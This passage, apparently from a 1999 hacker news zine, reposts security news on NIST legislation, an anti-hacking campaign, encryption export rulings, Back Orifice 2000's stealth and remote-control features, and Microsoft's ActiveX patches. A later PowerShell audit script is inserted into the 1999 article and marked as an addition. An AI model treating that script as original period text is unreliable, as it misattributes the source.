computer security protection in our federal agencies has the potential to dwarf the millennium bug in scope and magnitude,"
Subcommittee Chairwoman Constance Morella, R-Md., said in prepared remarks today.
Among other things, H.R. 2413 would require NIST to serve as a computer security consultant for other federal agencies. In
that role NIST would advise agencies on what "off-the-shelf" computer security products met with the government's approval.
NIST would provide that list of approved products to the public as well.
The bill also requires the Under Secretary of Commerce to establish a "clearinghouse of information" on computer security
threats and to make that list available to the public.
If passed, the bill will "get civilian agencies to pay more attention to information security," said Information Technology
Association of America President Harris Miller after today's hearing.
In addition to its computer security provisions, the bill also establishes a new, NIST-administered computer science
fellowship program for students studying computer security.
Reported by Newsbytes.com, http://www.newsbytes.com.
15:56 CST
@HWA
56.0 JUSTICE DEPT. TO FUND ANTIHACKING CAMPAIGN
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 1st October 1999 on 9:15 am CET
In March, Cybercitizen Partnership was announced, an awareness campaign
coordinated by the Information Technology Association of America. The US Justice
Department will provide $300,000 funding of the Cybercitizen Partnership and so,
according to this article, will assume the unusual role of helping to educate budding
Web users about how to be responsible, law-abiding surfers. Hallelujah
http://www.thestandard.net/articles/display/0,1449,6711,00.html?home.tf
Justice Dept. Funds
Antihacking Campaign
By Keith Perine
WASHINGTON -- The Justice Department is
trying to save children before they turn into
hackers.
With its $300,000 funding of the
Cybercitizen Partnership, an awareness
campaign coordinated by the Information
Technology Association of America, the
Justice Department assumes the unusual role
of helping to educate budding Web users
about how to be responsible, law-abiding
surfers.
The Cybercitizen Partnership, announced in
March, is a joint Justice-ITAA effort aimed
at protecting the country's Internet
infrastructure from outlaw hackers and other
criminals. Faced with a security breach, law
enforcement officials don't know at first if
they're confronting a foreign terrorist, a
college student or a couple of sixth-graders
who are having some fun with Dad's
computer. But an ITAA official said that,
upon investigation, a surprising number of
cases involve child hackers.
The association says that information
technology makes up about 6 percent of the
global gross domestic product -- some $1.8
trillion of electronic infrastructure that needs
to be protected against disgruntled former
employees, corporate spies and juvenile
delinquents who like to pull pranks.
Figuring that it's too late to reform terrorists
and spies, the ITAA decided to concentrate
on the kids. The campaign, which debuts in
January, will initially target children 12 and
under, aiming to teach them proper online
behavior and to instill a healthy disdain for
hacking. The association wants to "help
weed out some of the less meaningful
system violations by curious children so that
law enforcement can focus on the true
criminals," says ITAA President Harris Miller.
The cash infusion from the Justice
Department is in keeping with a long
tradition of government-sponsored public
education campaigns, from the Interior
Department's Smokey the Bear messages
against forest fires to the Drug Enforcement
Administration's "Just Say No" war on drugs.
Miller says the campaign could be expanded
to educate kids about other aspects of
proper Internet etiquette, such as warning
them against sending spam -- for kids, the
modern-day equivalent of prank telephone
calls -- or visiting Web sites with adult
content. The main focus of the campaign,
however, will be to "send the message that
hacking isn't cute, clever or funny." In
addition to the funding from Justice, the
ITAA also plans to pass the hat among its
own membership, a who's-who list of the
high-tech industry that includes Microsoft
(MSFT), America Online (AOL) and IBM
(IBM). The association will also seek funds
from foundations and possibly from private
individuals.
The association has sent out a request to
several public relations companies for ideas
on how to run the campaign, which might
include television and Internet advertising,
brochures and even visits to schools. One
possibility under consideration: the creation
of a mascot, like the famous McGruff crime dog, to pass the message
along in a friendly manner.
@HWA
57.0 COURT TO REVISIT CRYPTO RULING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 1st October 1999 on 9:01 am CET
A U.S. federal appeals court will reexamine a trial court's decision to lift U.S.
government restrictions on the export of encryption technology. The 9th U.S. Circuit
Court of Appeals withdrew a May decision by a panel of three of its judges, which had
endorsed the trial court ruling. In May, the panel of 9th Circuit judges concluded that
the federal government could not limit professor Daniel J. Bernstein's efforts to
distribute encryption software. Read more
http://news.cnet.com/news/0-1005-200-424043.html?tag=st.ne.1002.bgif.1005-200-424043
Court to revisit encryption ruling
By Bloomberg News
Special to CNET News.com
September 30, 1999, 1:30 p.m. PT
SAN FRANCISCO--A U.S. federal appeals court will reexamine a trial court's decision to lift U.S. government
restrictions on the export of encryption technology.
The 9th U.S. Circuit Court of Appeals withdrew a May decision by a panel of three of its judges, which had endorsed the trial court
ruling. That indicates that a majority of the active 9th Circuit judges have reservations about the opinion or feel the encryption
issue is significant enough to be revisited.
In May, the panel of 9th Circuit judges concluded that the federal government could not limit professor Daniel J. Bernstein's efforts
to distribute encryption software.
Many companies, such as Network Associates, have been prevented by U.S. law from selling data-scrambling technology
overseas.
Earlier this month, it was reported that the Clinton administration is easing restrictions on data-scrambling technology, clearing
the way for Network Associates and other companies to sell the hardest-to-crack encryption technology.
Copyright 1999, Bloomberg L.P. All Rights Reserved.
@HWA
58.0 DRAM ROBBERIES
~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 1st October 1999 on 8:40 am CET
Dane-Elec (UK) warned fellow memory distributors to keep DRAM under surveillance
following a robbery at their warehouse. The Surrey-based distributor said it was
broken into at 2am yesterday morning. But the robbers were disturbed by a security
guard and got away with less kit than they intended. 128MB and 64MB modules were
stolen. Though the value wasn't disclosed, the company said it was small, and less
than a tenth of the company's stock. Word on the street is that this could be
anything between £1 million and £3 million. The Register
http://www.theregister.co.uk/
@HWA
59.0 DON'T BLAME BO FOR SECURITY PROBLEMS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Thursday 30th September 1999 on 9:30 am CET
CNN spoke to Bruce Schneier about the BackOrifice remote administration tool.
According to him, "Back Orifice will be used by lots of unethical people to do all sorts
of unethical things, which is not good." But he also mentions some other things
people should take to heart: programs such as pcAnywhere are as much "evil hacking
tools" as BO. Microsoft responds to security threats only if they are demonstrated.
Explain the threat in an academic paper and Microsoft denies it; release a hacking
tool like Back Orifice and suddenly they take the vulnerability seriously. CNN
http://cnn.com/TECH/computing/9909/29/back.orifice.idg/index.html
Don't blame Back Orifice for
security problems
September 29, 1999
Web posted at: 10:50 a.m. EDT (1450 GMT)
by Ann Harrison
(IDG) -- BackOrifice is a remote administration tool for Microsoft Windows and, as Bruce Schneier, chief
technology officer at San Jose-based managed security services firm Counterpane Internet Security Inc. (link
below), points out, "one of the coolest hacking tools ever developed."
Computerworld reporter Ann Harrison spoke with him recently about the tool,
which he insists has gotten an undeservedly bad reputation.
Back Orifice 2000 (BO2K) is free, open source and available at
www.bo2k.com (link below).
Q: How does BO2K work?
A: There are two parts: a client and a server. The server is installed on the
target machine. The client, residing on another machine anywhere on the
Internet, can now take control of the server.
This is actually a legitimate requirement. Perfectly respectable programs, like pcAnywhere or Microsoft
Systems Management Server [SMS], do the same thing. They allow a network administrator to remotely
troubleshoot a computer. If the server is installed on a computer without the knowledge or consent of its
owner, the client can effectively "own" the victim's PC.
Q: Why has BO2K acquired a reputation as only a hacker's tool?
A: Back Orifice's difference is primarily marketing spin. Since it was written by hackers, it is evil.
That's wrong; pcAnywhere is just as much an evil hacking tool as Back Orifice.
Not only can the client perform normal administration functions on the server's
computer -- upload and download files, delete files, run programs, change
configurations, take control of the keyboard and mouse, see whatever is on the
server's screen -- but it can also do more subversive things: reboot the
computer, display arbitrary dialog boxes, turn the microphone or camera on
and off, capture keystrokes and passwords. And there is an extensible plug-in
language for others to write modules.
Q: How does BO2K run in stealth mode?
A: Unless the server's owner is knowledgeable (and suspicious), he will never
know that Back Orifice is running on his computer.
Other remote administration tools, even SMS, also have stealth modes. Back
Orifice is just better at it.
Because Back Orifice is configurable, because it can be downloaded in source
form and then recompiled to look different... I doubt that all variants will ever
be discovered.
BO2K's slogan is "show some control," and many will take that imperative
seriously. Back Orifice will be used by lots of unethical people to do all sorts
of unethical things. And that's not good.
Q: Back Orifice can't do anything until the server portion is installed
on some victim's computer, right?
A: Yes. This means that the victim has to commit a security faux pas before
anything else can happen. Not that this is very hard -- lots of people network
their computers to the Internet without adequate protection.
Still, if the victim is sufficiently vigilant, he can never be attacked by Back
Orifice.
Q: What about Microsoft?
A: One of the reasons Back Orifice is so nasty is that Microsoft doesn't
design its operating systems to be secure. It never has.
In Unix, an attacker would first have to get root privileges. Not in Windows.
There's no such thing as limited privileges or administrator privileges or root
privileges. This might have made some sense in the age of isolated desktop
computers. But on the Internet, this is absurd.
There are provisions to make Windows NT a very secure operating system,
such as privilege levels in separate user accounts, file permissions and kernel
object access control lists.
You have to make 300-plus security checks and modifications to Windows NT
to make it secure. Microsoft refuses to ship the [operating system] in that
condition.
Malicious remote administration tools are a major security risk. What Back
Orifice has done is made mainstream computer users aware of the danger.
There are certainly other similar tools in the hacker world -- one, called
BackDoor-G, has recently been discovered -- some developed with much
more sinister purposes in mind.
Microsoft responds to security threats only if they are demonstrated. Explain
the threat in an academic paper and Microsoft denies it; release a hacking tool
like Back Orifice and suddenly they take the vulnerability seriously.
@HWA
60.0 WHY HACKING CONTESTS ARE A BAD IDEA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Thursday 30th September 1999 on 9:15 am CET
Ira Winkler responds in a commentary to the new trend to test an OS by encouraging
people to hack into it. A nice overview of the "don'ts" and inaccuracy of such a
manner of testing. Read more
HTTP://www.zdnet.com/zdtv/cybercrime/spyfiles/story/0,3700,2343174,00.html?chkpt=zdnnp1ms
Why Hacking Contests Are
a Bad Idea
Contests that encourage people to
hack are not a good way to test an OS.
By Ira Winkler October 4, 1999
When ZDTV informed me of a hacker
contest being sponsored by PC Week, I
thought it was a joke. Yet after visiting
the site, I'm not laughing. There are so
many reasons why this test is a bad idea.
Many people, however, might think that a
hacker contest is the only way to
thoroughly check the security of a
system.
The logic, as stated on the PC Week
website, was to definitively determine
which of the two operating systems is more
secure: Windows NT or Unix. According to
the stated logic, there is no better way to
determine security than by having
everyone in the world try to break into
the systems. Of course, the less secure
system would fall first. To make sure that
PC Week attracted the best talent in the
world to take part in this test, the
contest organizers offered a $1,000
reward. To a layperson, this may make
sense.
There is much more to security than just
the operating system. There are two
basic methods for breaking into a
computer.
1. Exploit problems built into the
underlying operating system and
applications.
2. Exploit problems with the way that
administrators and users configure,
manage, and use the system.
To first assume that hacking tests are
valid, the systems must be configured
perfectly. That in itself is asking a lot.
In Search of Security
Then you have to assume that the
applications that were used to provide the
Web functionality are also secure. After
all, you are asking to decide if Windows
NT is a good platform -- not if Windows NT
with a specific Web server application is
secure. If there is an exploitation that
compromises the server application, it
doesn't mean that the operating system is
the problem.
The next problem is with the Unix/Linux
side of the test. There are many different
versions of Unix and Linux. Just because
there might be a weakness in Red Hat
Linux, for example, doesn't mean that all
other versions of Linux have that
weakness.
Next you have to look at the goal of the
test. If the goal is to have someone break
into a site and manipulate the webpages,
that is one issue. But what happens if
someone takes the system down? A Denial
of Service attack could be more
devastating than if someone actually
broke in and modified webpages. In theory
a person who has broken into a system
can do both, however taking a system
down is bad enough.
Probably what is most surprising is that
the PC Week Linux system was "hacked"
first. According to the rules of the "test,"
this means that Windows NT is more
secure than Linux. I don't know any
security professional who would buy that
argument. And I doubt that Microsoft will
now start telling people that NT is more
secure than Linux, based on this "test."
There are many other reasons, from a
technical perspective, as to why this is a
bad test. However I should reserve some
space for the logistical perspective of
using "hackers" to test security.
Eyes on the Prize
Although the contest organizers at PC
Week probably believe that $1,000 is
enough to attract the attention of the
best hackers in the world, $1,000 is not
nearly enough to attract the attention of
the more competent hackers. Talented
security people, whom PC Week expects
to attract to the test, can earn as much
as $2,000 a day in consulting rates.
Additionally there have been other "hacker
challenges." These challenges were set up
in an unrealistic manner, and the way to
collect the "prize" required more effort
than it was worth. Past hacker challenges
have discouraged the better hackers.
Another issue is that you have to assume
that everyone has heard about this test.
Although there may have been some talk
about the challenge on some online
forums, this test has definitely not made
the rounds.
Probably the most serious of the problems
is that there is no right way to define
"The Most Secure Operating System."
However, the most agreed-upon way to
examine security is by looking at the
source code of the operating system.
Microsoft is not about to divulge the
source code to PC Week for a detailed
examination of Windows NT security.
So, what is the most secure operating
system? It is simply the system that you
can maintain best. Even if you could
identify the most secure operating
system, it will only be secure as long as it
is properly configured, maintained, and
used.
Therefore, the most potentially secure
operating system is the one that you
know best. For example, if your
organization has administrators who are
real NT experts, you would be a fool to
use an unfamiliar operating system for no
other reason than you think it is more
secure. Likewise, people would be fools to
turn away from Linux, because it was the
first system hacked in the PC Week test.
I have seen very secure NT websites,
because they were well maintained. I
have also seen very insecure NT
websites because they were poorly
maintained. PC Week would better serve
its readers by testing administrator
training programs rather than operating
systems.
Postscript
As the PC Week security test progresses,
it continues to show why the test isn't
the greatest idea. First there is an issue
that I didn't want to point out in the
original column.
About a year ago, I helped
ComputerWorld organize a test of
firewalls that would have been similar in
nature to this hacker challenge. One of
the first issues we considered was that if
we opened up the test to everyone,
people might get bored with hacking the
test system and turn their attention to
ComputerWorld's operating systems.
The people at ComputerWorld decided
that this was a very real threat and
decided against an open challenge.
Now, a series of posts on the PC Week
Security Forum openly recommend or
encourage the hacking of the
Ziff-Davis-owned site as an extension of
this test. Whether or not people actually
go after the Ziff-Davis site is one story,
but a little forethought would have been
wise.
The second issue to consider is that, as I
stated in the original column, the system
must be configured securely by the
administrators before a test can be
deemed valid. It appears that the Linux
hack was a result of a cgi scripting
program as well as an unapplied patch (or
security fix). Both of these are
configuration issues and the result of
administration practices, not the
underlying software. Again I would
recommend that administrator training
programs be tested, if you want a really
useful security-related test.
@HWA
61.0 NO $35 MILLION FOR DOE CYBER SECURITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 29th September 1999 on 8:55 pm CET
The Senate yesterday passed an energy appropriations bill that omits $35 million
requested by Energy Secretary Bill Richardson for increased computer security.
Richardson, traveling overseas, issued a statement charging that Congress was
withholding "important tools needed to implement security reform" that Congress
itself had demanded and that now "it will be impossible to provide real-time cyber
intrusion detection and protection for 70 Energy Department sites." Newsbytes
http://www.newsbytes.com/pubNews/99/137008.html
DOE Loses $35 Million for Cyber Security
By Walter Pincus and Vernon Loeb, Washington Post
WASHINGTON DC, U.S.A.,
29 Sep 1999, 9:03 AM CST
The Senate yesterday passed an energy appropriations bill that omits $35 million requested by Energy
Secretary Bill Richardson for increased computer security. The money was eliminated despite months of
heated debate over suspected Chinese espionage, during which leading Republicans accused the Clinton
administration of foot-dragging on security.
Richardson, traveling overseas, issued a statement charging that Congress was withholding "important tools needed to
implement security reform" that Congress itself had demanded.
Without the $35 million, Richardson said, "it will be impossible to provide real-time cyber intrusion detection and protection
for 70 Energy Department sites."
The money was eliminated by a House-Senate conference reconciling differences between the initial versions of the bill
passed by the two chambers. A member of the conference committee, who requested anonymity, said the $35 million was
eliminated because members "want to see management reform" before they approve a huge funding increase.
The committee member noted that Richardson is developing a $450 million cyber security proposal for fiscal 2001. It would
include money to replace all personal computers used in classified programs with machines that do not have floppy disk
drives, and thus cannot easily be downloaded.
Congress's action leaves the department with the $2 million it originally sought for computer security before suspected
Chinese espionage came to dominate political debate in Washington last spring.
Cyber security, in particular, became a major concern after it was discovered that the government's prime espionage
suspect at the Los Alamos National Laboratory, Chinese American physicist Wen Ho Lee, had downloaded classified
information to his unclassified computer. Lee, who denies passing secrets to China, was fired but has not been charged
with any crime.
Meanwhile, the Energy Department's director of counterintelligence, Edward J. Curran, acknowledged yesterday that he
recommended his brother, a retired police detective, for a $70-an-hour temporary job reviewing counterintelligence
operations at the department's three nuclear weapons laboratories.
But he said the department's inspector general determined that his recommendation did not violate federal
conflict-of-interest statutes. "I recommended my brother, yes, but he does not work directly for me," Curran said.
Michael Curran, a veteran of 27 years as a detective for the Waterfront Commission of New York Harbor, has participated in
a two-week counterintelligence inspection at Lawrence Livermore National Laboratory in California and is now
part of a nine-member team reviewing security at the Los Alamos lab in New Mexico.
All told, he will work about six weeks this fall, Edward Curran said, and will participate in additional counterintelligence
inspections at Energy Department facilities next year.
Reported by Newsbytes.com, http://www.newsbytes.com
09:03 CST
Reposted 11:14 CST
@HWA
62.0 DOD SELLS NON Y2K COMPLIANT EQUIPMENT WITHOUT WARNING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 29th September 1999 on 8:35 pm CET
The Defense Department donated or sold hundreds of thousands of computers,
medical devices and other electronic equipment to state and local agencies, hospitals
and other public institutions that could fail to operate because of Year 2000 problems.
The medical property included devices critical to health and safety, such as
anesthesia apparatus, fetal heart monitors and X-ray equipment. Read more
http://www.fcw.com/pubs/fcw/1999/0927/web-dod-09-28-99.html
SEPTEMBER 28, 1999 . . . 16:54 EDT
DOD resold non-Y2K compliant computers,
medical devices
BY DANIEL VERTON (dan_verton@fcw.com)
The Defense Department donated or sold hundreds of thousands of
computers, medical devices and other electronic equipment to state and local
agencies, hospitals and other public institutions that could fail to operate because
of Year 2000 problems.
In a report released this week, the Pentagon's inspector general found that
many of the 340,000 excess medical devices and 77,900 excess computer
systems donated or sold by DOD between Oct. 1, 1998, and March 31, 1999,
may not have been Year 2000-compliant and could fail to operate properly after
Dec. 31.
"The medical property included devices critical to health and safety, such as
anesthesia apparatus, fetal heart monitors and X-ray equipment," the report
stated. However, auditors admitted that the list of 340,000 medical devices also
included many items that are not deemed critical to public health and safety and
do not rely on date-dependent computer microchips.
In one case, the Naval Medical Center in Portsmouth, Va., transferred 9,000
pieces of equipment to the Defense Reutilization and Marketing Service -- the
DOD agency responsible for disbursing equipment that is no longer needed --
for sale or donation to other institutions without assessing any of them for
potential Year 2000 problems.
In fact, of the 9,000 items cited, 2,000 posed a high or medium health risk, the
report stated. According to the IG, plans called for these items to be transferred
or sold to the DOD Humanitarian Assistance Program, the Indian Health
Service, state and local agencies and the general public.
In addition to medical devices, the Defense Information Systems Agency and
the Defense Logistics Agency sold or donated more than 77,900 pieces of
computer equipment to various federal, state and local law enforcement
agencies that also may be at risk of Year 2000 failures.
"DISA did not notify recipients that equipment may not be Y2K compliant or
provide a disclaimer that equipment was made available without warranty for
fitness of use," the IG report stated. The equipment transferred to law
enforcement agencies included various communications security and cryptologic
devices, radio navigation equipment and electronic countermeasures equipment.
In his response accompanying the report, Marvin Langston, DOD's deputy chief
information officer, said the department agrees with the findings of the IG report
and is changing its Year 2000 Management Plan to address the disposal of
Year 2000-sensitive equipment. "Because of the potential risk to the general
public, this document also addresses biomedical equipment turned in to the
Defense Reutilization and Marketing Service," Langston said.
However, Rear Adm. E.R. Chamberlin, deputy director of DLA, which
oversees the various DRMS facilities throughout DOD, said the IG report
"exaggerates" the Year 2000 risks associated with excess and surplus
equipment, particularly medical equipment.
"We offer excess and surplus equipment on an 'as is, where is' basis, with no
express or implied warranties for fitness of use," Chamberlin said. "DLA
reviewed medical items [in the categories audited] and only .2 percent were
found to have an embedded chip and none to be date-sensitive," he said.
@HWA
63.0 HATE ON GOVERNMENT WEB SITE
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 29th September 1999 on 8:25 pm CET
A Florida sheriff is using an official government web site to espouse his views on
abortion, school prayer, and the "moral corruption" brought by various social groups
and organizations. Because McDougall's message is posted on a site that is
apparently taxpayer supported, his words have sparked debate about whether the
message constitutes protected free speech or an illegal use of government property
to express personal views. Full story
http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2342354,00.html
Sheriff's Opinion: Free
Speech or Illegal Posting?
A Florida law enforcement official
posts message on government site
blasting gays, abortion, and the ACLU.
September 27, 1999
A Florida sheriff is using an official
government website to espouse his views on
abortion, school prayer, and the "moral
corruption" brought by various social
groups and organizations.
The message, written as a letter by
Sheriff John J. McDougall, is posted on the
Lee County Sheriff's Office website. It
lambastes homosexuals, feminists,
atheists, Planned Parenthood, and the
American Civil Liberties Union, among
others.
Because McDougall's message is posted
on a site that is apparently taxpayer
supported, his words have sparked debate
about whether the message constitutes
protected free speech or an illegal use of
government property to express personal
views. However, there is currently no law
to force McDougall to pull his message
down.
In the letter, McDougall says he strongly
opposes the elimination of Catholic prayer
in public schools. He urges America to
"wake up" and fight against "...the
diabolical forces of moral corruption
working feverishly behind closed doors."
He cites as culprits "the gay and lesbian
coalitions, rabid feminist groups, United
Nations one-world government radicals,
and the American Civil Liberties Union."
In an ironic twist, the ACLU, one of
McDougall's prime targets, is defending his
right to speak-- although the Florida
chapter of the ACLU called McDougall's
viewpoints "disturbing."
For more on this story by CyberCrime
Legal Analyst Luke Reiter, including
excerpts of the message and an interview
with the Florida ACLU, click on the TV
icon above.
@HWA
64.0 MS: JUST KEEP ON PATCHING
~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 29th September 1999 on 8:00 pm CET
Microsoft has patched a handful of security holes in its Internet Explorer browser and
ActiveX technology that made computers vulnerable to attack by malicious Web site
operators. The nice folks at Cnet were kind enough to put them together for us one
more time (the last hopefully.. nah :). More info
http://news.cnet.com/news/0-1005-200-360962.html?tag=st.ne.1002.tgif?st.ne.fd.gif.e
Microsoft patches Internet Explorer, ActiveX holes
By Paul Festa
Staff Writer, CNET News.com
September 29, 1999, 4:00 a.m. PT
Microsoft has patched a handful of security holes in its Internet Explorer browser and ActiveX technology that made
computers vulnerable to attack by malicious Web site operators.
The first patch takes care of a problem with IE's ImportExportFavorites feature, which lets users transfer lists of frequently visited
Web addresses. The bug lets a malicious Web site operator run executable code on the computer of someone who visits that
Web site.
"The net result is that a malicious Web site operator potentially could take any action on the computer that the user would be
capable of taking," Microsoft warned in a security alert earlier this month.
Microsoft's patch eliminates the problem, the company said today. Versions 4.01 and 5.0 of IE are
at risk. The patch also fixes a related problem involving ActiveX, Microsoft's technology for bringing
interactive scripts and controls to Web pages.
ActiveX has long been a security headache for Microsoft. Critics of the technology fault its
"trust-based" security model, in which signatures let users choose whether to download an ActiveX
control. With this system, users are expected to judge that controls signed by well-known
companies like Microsoft are less likely to be maliciously designed than those signed by unknown
entities.
In the latest discovery, Microsoft identified eight ActiveX controls it said were "incorrectly marked as
'safe for scripting,'" a designation that assures users that they can download the controls without
posing any security risk to their own computers. The controls could be manipulated for malicious
ends, however, Microsoft said.
The controls in question are Kodak Image Edit: Wang Imaging; Kodak Image Annotation: Wang Imaging; Kodak Image Scan:
Wang Imaging; Kodak Thumbnail Image: Wang Imaging; Wang Image Admin: Wang Imaging; HHOpen: HTML help files;
Registration Wizard: Internet Explorer Product Registration; and IE Active Setup: Internet Explorer Setup.
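As an added example (not from the CNET article, Microsoft, or the vendors of the controls named above), the PowerShell script below inventories the ActiveX controls registered on a Windows host that carry the "safe for scripting" designation the article describes, so an administrator can see which controls a web page is allowed to drive and whether Internet Explorer's later "kill bit" mechanism has since disabled any of them. The category GUID, the Implemented Categories registry layout and the ActiveX Compatibility kill-bit value are standard Windows locations; the function name and the -ExcludeWindowsDir switch are my own and are not built-in cmdlets.

```powershell
# Added example, not from the article, Microsoft or the control vendors:
# list the ActiveX controls this Windows host registers as "safe for scripting".
# A control opts in by listing the category GUID
#   {7DD95801-9882-11CF-9FA9-00AA006C42C4}  (CATID_SafeForScripting)
# under HKCR\CLSID\<clsid>\Implemented Categories. Controls can also opt in at
# run time via the IObjectSafety interface; this script does not probe that, so
# it reports only the statically declared set.
# IE's later mitigation for a bad control is the "kill bit": bit 0x400 of the
# "Compatibility Flags" value under ...\Internet Explorer\ActiveX Compatibility\<clsid>.
# Function name and the -ExcludeWindowsDir switch are mine (assumed, not standard cmdlets).

$CatidSafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$CatidSafeForInit      = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
$KillBitRoot = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility'

function Get-ScriptableActiveX {
    [CmdletBinding()]
    param(
        # Hide controls served from %SystemRoot%, leaving the third-party and add-on
        # controls (like the imaging controls named in the article) that deserve a look first.
        [switch]$ExcludeWindowsDir
    )
    $winDir = $env:SystemRoot

    Get-ChildItem -Path 'Registry::HKEY_CLASSES_ROOT\CLSID' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $clsidKey = $_
        $clsid    = $clsidKey.PSChildName

        # Step 1: keep only controls that declare the safe-for-scripting category.
        $catPath = Join-Path $clsidKey.PSPath 'Implemented Categories'
        if (-not (Test-Path -Path $catPath)) { return }
        $cats = @(Get-ChildItem -Path $catPath -ErrorAction SilentlyContinue | ForEach-Object PSChildName)
        if ($cats -notcontains $CatidSafeForScripting) { return }

        # Step 2: locate the DLL or EXE that implements the control.
        $server = $null
        foreach ($srvKey in 'InprocServer32', 'LocalServer32') {
            $srvPath = Join-Path $clsidKey.PSPath $srvKey
            if (Test-Path -Path $srvPath) {
                $server = (Get-ItemProperty -Path $srvPath -ErrorAction SilentlyContinue).'(default)'
                if ($server) { $server = $server.Trim('"') }
                break
            }
        }
        if ($ExcludeWindowsDir -and $server -and $server.StartsWith($winDir, 'OrdinalIgnoreCase')) { return }

        # Step 3: has IE's kill bit already disabled this control?
        $killBit = $false
        $compatPath = Join-Path $KillBitRoot $clsid
        if (Test-Path -Path $compatPath) {
            $flags = (Get-ItemProperty -Path $compatPath -ErrorAction SilentlyContinue).'Compatibility Flags'
            if ($flags -and ($flags -band 0x400)) { $killBit = $true }
        }

        [pscustomobject]@{
            CLSID       = $clsid
            Name        = (Get-ItemProperty -Path $clsidKey.PSPath -ErrorAction SilentlyContinue).'(default)'
            Server      = $server
            SafeForInit = ($cats -contains $CatidSafeForInit)
            KillBitSet  = $killBit
        }
    }
}

# Usage: rows with KillBitSet = False are the controls a web page could still script.
Get-ScriptableActiveX -ExcludeWindowsDir | Sort-Object Name | Format-Table -AutoSize
```

The useful check is the combination of columns: a control that is safe for scripting, not kill-bitted, and served from a third-party path is exactly the kind of component the article's patch addressed, and the list gives an administrator something concrete to compare against the vendor's advisories.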
Microsoft credited Bulgarian bug hunter Georgi Guninski with discovering the so-called ImportExportFavorites bug. Richard Smith
of Pharlap Software and Australian bug hunter Shane Hird were recognized for discovering the ActiveX problems.
@HWA
-=----------=- -=----------=- -=----------=- -=----------=-
O
0
o
O O O
0
-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
END of main news articles content... read on for ads, humour, hacked websites etc
-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
HWA.hax0r.news
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
http://www.2600.com/
http://www.kevinmitnick.com/
+-----------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
* http://www.csoft.net One of our sponsors, visit them now www.csoft.net *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! ............c'mon, you KNOW you
wanna...yeah you do...make it fresh and new...be famous...<sic>
____ _ _ _ _ _
/ ___| ___ _ __ __| (_)_ __ _ _ ___ _ _ _ __ / \ ___ ___(_|_)
\___ \ / _ \ '_ \ / _` | | '_ \| | | |/ _ \| | | | '__| / _ \ / __|/ __| | |
___) | __/ | | | (_| | | | | | |_| | (_) | |_| | | / ___ \\__ \ (__| | |
